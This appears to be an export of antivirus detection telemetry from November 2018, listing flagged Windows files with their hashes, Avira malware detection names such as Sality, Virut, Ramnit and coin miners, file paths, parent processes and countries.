  Row(detection=Row(filename='avscan-20181101-153140-c9bdb301', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_787b8ae0\\AVSCAN-20181101-153123-C7455240\\AVSCAN-20181101-153140-C9BDB301', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='argent.exe', filepath='C:\\Program Files (x86)\\Shirl\\argent.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\neutral\\competitively.exe', parentsize=49436, timestamp='2018-11-01T14:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shirl.exe', filepath='C:\\Program Files (x86)\\Shirl\\Shirl.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Program Files\\Yamicsoft\\Windows 10 Manager\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:K3cFWmU5SEmzOD+d.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='shram_3d_scar_3d_djed_veyntrob_2007_triller_ujasy_dvdrip.exe', filepath='C:\\Users\\X\\Downloads\\shram_3d_scar_3d_djed_veyntrob_2007_triller_ujasy_dvdrip.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='05ad332369e650c75a819985cdb687fa151e30a7c1487581a6e5988bc674562b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:40:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230013-bc2cf258', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_641529ab\\AVSCAN-20181101-225035-6DA160CC\\AVSCAN-20181101-230013-BC2CF258', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='05ad332369e650c75a819985cdb687fa151e30a7c1487581a6e5988bc674562b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ff_tomsmocomp.dll', filepath='\\\\?\\E:\\暴风影音\\codec\\ff_TomsMoComp.dll', filesize=4160000, name='W32/Ramnit.CD.#M1.#R1'), hash='0640858091c79cfc0c34b4d19e378baff12bdcd2ce782ea93ed5790a6d3eb6c7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ff_tomsmocomp.dll', filepath='E:\\暴风影音\\codec\\ff_TomsMoComp.dll', filesize=4160000, name='W32/Ramnit.CD.#M1.#R1'), hash='0640858091c79cfc0c34b4d19e378baff12bdcd2ce782ea93ed5790a6d3eb6c7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:09:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='06700c3435c37b025115cba919d8aff0b59805d69594f21645be7a52aaebf5e7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\06700C3435C37B025115CBA919D8AFF0B59805D69594F21645BE7A52AAEBF5E7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06700c3435c37b025115cba919d8aff0b59805d69594f21645be7a52aaebf5e7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:54:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:31:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092339-d0bf76b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce04639c\\AVSCAN-20181101-092029-AC75D7C4\\AVSCAN-20181101-092339-D0BF76B9', filesize=384000, name='HEUR/AGEN.1000013.#M1.#R1'), hash='06ce24b74bc7c51ab4939a136201ebb18c1edf3012939dab3e4af592218d5394', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:23:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-041200-2d2bbcbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7741a6d\\AVSCAN-20181102-040844-166805B3\\AVSCAN-20181102-041200-2D2BBCBB', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100145-2eebc6fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c21d6ca\\AVSCAN-20181101-095851-16A7EBA1\\AVSCAN-20181101-100145-2EEBC6FD', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-041134-2a29e3e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d7741a6d\\AVSCAN-20181102-040844-166805B3\\AVSCAN-20181102-041134-2A29E3E8', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063157-dde27841', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88b84a21\\AVSCAN-20181101-055743-1315B9BD\\AVSCAN-20181101-063157-DDE27841', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100539-4f942854', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c21d6ca\\AVSCAN-20181101-095851-16A7EBA1\\AVSCAN-20181101-100539-4F942854', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T23:46:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154400-f312ebd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-154400-F312EBD5', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:44:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154528-fd4a82d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a955cb2e\\AVSCAN-20181101-153244-A478C5C4\\AVSCAN-20181101-154528-FD4A82D2', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-024920-9b9b9992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d265d3ba\\AVSCAN-20181102-024828-93CDD881\\AVSCAN-20181102-024920-9B9B9992', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:49:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dukenukemmp.exe', filepath='\\?\\J:\\العاب2\\رجل المهمات\\DukeNukemMP.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0713f22d733572db1a5425aec02945fe66e79042a9f3af903be5ca708bfe654b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rvjzg9v', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RVJZG9V', filesize=64000, name='TR/Dldr.Script.sarmk.#M1.#R1'), hash='072bfde5fcec1822ca866eee949940153e6fba29fcd5a4ee02ddb4ff8632d8fc', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:53:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184201-a24db937', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184201-A24DB937', filesize=64000, name='TR/Dldr.Script.sarmk.#M1.#R1'), hash='072bfde5fcec1822ca866eee949940153e6fba29fcd5a4ee02ddb4ff8632d8fc', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pddautomationclient.exe', filepath='\\\\?\\D:\\HIS\\PDDAutomation(1397.01.29)(Ver.1.0.0.164)17332\\PDDAutomation(1397.01.29)(Ver.1.0.0.164)17332\\PDDAutomationClient.exe', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='07d91eb66a2dd32de883afd6ebd6bfb390561d690b34a1d996e8a43ff8c629c6', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07ddd54fce2f21ecca5e60754450ce540abd1a7b0609f10a00fb08874cf5f366', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Master\\SalityKiller.exe', parentsize=171344, timestamp='2018-11-01T03:00:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T06:50:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111108-5bef0b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118ac77b\\AVSCAN-20181101-094023-456A0C31\\AVSCAN-20181101-111108-5BEF0B31', filesize=128000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0887bb07a45c6da29ed151f86a5f5422461d2380abcac019ee14176df5c3dda7', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oobebaln.exe', filepath='D:\\Backup\\Windows\\system32\\oobe\\oobebaln.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='08b681b20838b782823dabc5f882d2a9ed64e6182fe34777be72fd64ee769d85', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:39:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='D:\\SETUP TN\\Crtal 8.5\\V8.5\\REDIST\\IT\\MDAC_TYP.EXE', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='08be2734df3cfcd7dc5c69c851a58e49411d340cc7f30aaad88f18067e996b36', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='\\\\?\\D:\\SETUP TN\\Crtal 8.5\\V8.5\\REDIST\\IT\\MDAC_TYP.EXE', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='08be2734df3cfcd7dc5c69c851a58e49411d340cc7f30aaad88f18067e996b36', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ftclean.exe', filepath='D:\\CPT\\โปรแกรม PLC Omron\\CXONE V4.1\\drivers\\USB\\7\\CS1W-CIF31\\FTClean.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='08e6f8fed603c8a9c670ca6fa5469ff66e9cf0b06acf666cd9afa5659839558e', metadata=Row(cmdline='\\/c', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=218704, timestamp='2018-11-01T04:15:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='farm 2.exe', filepath='\\?\\J:\\العاب2\\Farm 2\\Farm 2.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0a007ed2535090f436e5c44b70de8161a705367e494e9679e798a19a4988d635', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:07:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mss32midi.dll', filepath='\\?\\J:\\BlackShot\\System\\mss32midi.dll', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='0a2de1e0b9030ef1d54d37e984ebcf14778aa6203413ec1cc1b3be80534f7b71', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gالاشباح .exe', filepath='\\?\\J:\\العاب\\الاشباح\\gالاشباح .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0a4cb8c217235fa1c2ce0f45848f1f2dd353c29a18867f42827e9a8b96afdb2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:05:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files (x86)\\Steam\\SteamApps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='0ac4b0f50093a60f4d91af9def8c52e84384940b687730b5575abb9f6f143dbe', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T17:40:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0af08c3a8c1600b6bd8b4ee9e28f2dc77e3233a4b68fa57393067d783df03eb1.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0AF08C3A8C1600B6BD8B4EE9E28F2DC77E3233A4B68FA57393067D783DF03EB1.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0af08c3a8c1600b6bd8b4ee9e28f2dc77e3233a4b68fa57393067d783df03eb1', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-174343-82493a89', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181031-174331-7F9DFBD6\\AVSCAN-20181031-174343-82493A89', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\My Documents\\Preuzimanja\\flashupdate.exe', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:05:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231229-0bb89c55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668207b8\\AVSCAN-20181101-224116-DA675AA0\\AVSCAN-20181101-231229-0BB89C55', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\My Documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/BitCoinMiner.yvkvf.#M1.#R1'), hash='0b3d9eb00a2db866a6f9ae71f172007cdf17adde0a8e9aefb0e48d7ede56f28f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:56Z'), dt=datetime.date(2018, 11, 1)),
